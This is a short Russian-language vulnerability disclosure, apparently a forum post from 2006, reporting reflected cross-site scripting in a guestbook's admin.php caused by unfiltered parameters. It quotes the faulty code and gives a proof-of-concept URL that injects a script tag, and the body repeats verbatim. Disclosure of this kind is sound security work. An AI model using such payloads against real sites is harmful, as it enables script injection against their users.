1ten0.0net1
23.09.2006, 02:25
Из-за отсутствия фильтрации большинтсва параметров в скрипте admin.php становится возможной реализация XSS нападения.
Пример бажного кода admin.php:
$guestbookName=GUESTBOOK_NAME;
.....
<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">$guestbookName</p></a></td>
Значение константы GUESTBOOK_NAME присваивается переменной $guestbookNamе, при этом сама константа не определена.
Proof of concept:
http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>
Кроме этого уязвимы почти все остальные параметры данного скрипта. Видимо, создатели посчитали, что скрипт admin.php будет просматривать только админ.
P. S. Работает в Internet Explorer
Пример бажного кода admin.php:
$guestbookName=GUESTBOOK_NAME;
.....
<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">$guestbookName</p></a></td>
Значение константы GUESTBOOK_NAME присваивается переменной $guestbookNamе, при этом сама константа не определена.
Proof of concept:
http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>
Кроме этого уязвимы почти все остальные параметры данного скрипта. Видимо, создатели посчитали, что скрипт admin.php будет просматривать только админ.
P. S. Работает в Internet Explorer